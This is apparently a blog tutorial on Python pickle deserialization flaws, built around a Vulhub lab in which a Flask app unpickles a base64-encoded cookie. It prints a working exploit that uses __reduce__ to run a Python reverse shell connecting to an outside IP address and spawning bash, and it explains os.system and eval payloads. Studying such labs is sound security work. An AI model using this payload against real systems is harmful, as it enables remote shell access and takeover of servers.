Understanding Python Deserialization Vulnerabilities: A Deep Dive into Pickle Exploits

Although deserialization is not an issue inherent to the programming language itself, security research primarily focuses on Java and PHP deserialization vulnerabilities due to their broader application scenarios. For Python deserialization, it seems to appear more frequently in CTF challenges. Python mainly uses the `pickle` module to implement serialization. I noticed that Vulhub provides an environment for Python deserialization vulnerabilities, so I decided to study it.

Let’s first demonstrate Python serialization with a demo I wrote myself.

import pickle

class Hacker():
    def __init__(self, name):
        self.name = name
    def dream(self):
        print(self.name + ' Want To Be Awesome!')

Person = Hacker('Zgao')
Person.dream()
info = pickle.dumps(Person)
print(info)

I created a `Hacker` class, instantiated a `Person` object, and then serialized it using the `pickle` module. The corresponding output is:

Zgao Want To Be Awesome! b’\x80\x03c__main__\nHacker\nq\x00)\x81q\x01}q\x02X\x04\x00\x00\x00nameq\x03X\x04\x00\x00\x00Zgaoq\x04sb.’

The red part is the serialized content, which is essentially a bunch of characters. Of course, it can also be deserialized back into an object.

import pickle

class Hacker():
    def __init__(self, name):
        self.name = name
    def dream(self):
        print(self.name + ' Want To Be Awesome!')

Person = Hacker('Zgao')
info = pickle.dumps(Person)
a = pickle.loads(info)
a.dream()

The output is: Zgao Want To Be Awesome!

We deserialized it into the object `a` and successfully called the `dream` method. The process can be summarized as follows:

Serialization Process:

  1. Extract all attributes from the object and convert them into key-value pairs.
  2. Write the class name of the object.
  3. Write the key-value pairs.

Deserialization Process:

  1. Obtain the pickle input stream.
  2. Reconstruct the attribute list.
  3. Create a new object based on the class name.
  4. Copy the attributes into the new object.

However, it should be noted that this object can only be deserialized if it can be created in the current environment; otherwise, object reconstruction cannot be achieved. Python deserialization Now that we have a basic understanding of Python serialization and deserialization, let’s look at the vulnerability code provided by Vulhub.

import pickle
import base64
from flask import Flask, request

app = Flask(__name__)

@app.route("/")
def index():
    try:
        user = base64.b64decode(request.cookies.get('user'))
        user = pickle.loads(user)
        username = user["username"]
    except:
        username = "Guest"

    return "Hello %s" % username

if __name__ == "__main__":
    app.run()

It still uses Flask. From the code, we can see that it retrieves the `user` value from cookies, decodes it with Base64, and then deserializes it. If an exception occurs, it returns “Guest.” So, when we access it directly, we see “Hello Guest.” Python deserialization Although the logic is simple after reading the code—constructing a malicious class, serializing it, encoding it with Base64, and sending it as a cookie—let’s first look at the exploit provided by Vulhub, which I modified slightly.

#!/usr/bin/env python3
import requests
import pickle
import os
import base64

class exp(object):
    def __reduce__(self):
        s = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.240.75.183",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'"""
        return (os.system, (s,))

e = exp()
s = pickle.dumps(e)

response = requests.get("http://47.240.75.183:1900/", cookies=dict(user=base64.b64encode(s).decode()))
print(response.content)

Let’s analyze the exploit code. It embeds the reverse shell operation in Python code rather than directly using a Bash reverse shell. It also uses the `__reduce__` magic method. What is its purpose?

When defining custom types, if you want to pickle them, you must tell Python how to pickle them. The `__reduce__` method is called when the object is pickled. It either returns a string representing a global name (Python will look it up and pickle it) or a tuple. This tuple contains 2 to 5 elements, including: the first callable object, which is called to reconstruct the object; the second element, which provides arguments for the callable object; and the remaining optional elements.

For example, if the return is `(eval, (“os.system(‘ls’)”,))`, it executes the `eval` function with the tuple value as the argument, thereby achieving command or code execution. Similarly, it could return `(os.system, (‘ls’,))`.

However, to gain a deeper understanding of Python deserialization vulnerabilities, it’s necessary to analyze the `pickle` source code. This post only scratches the surface. I’ll delve further after reading the `pickle` source code.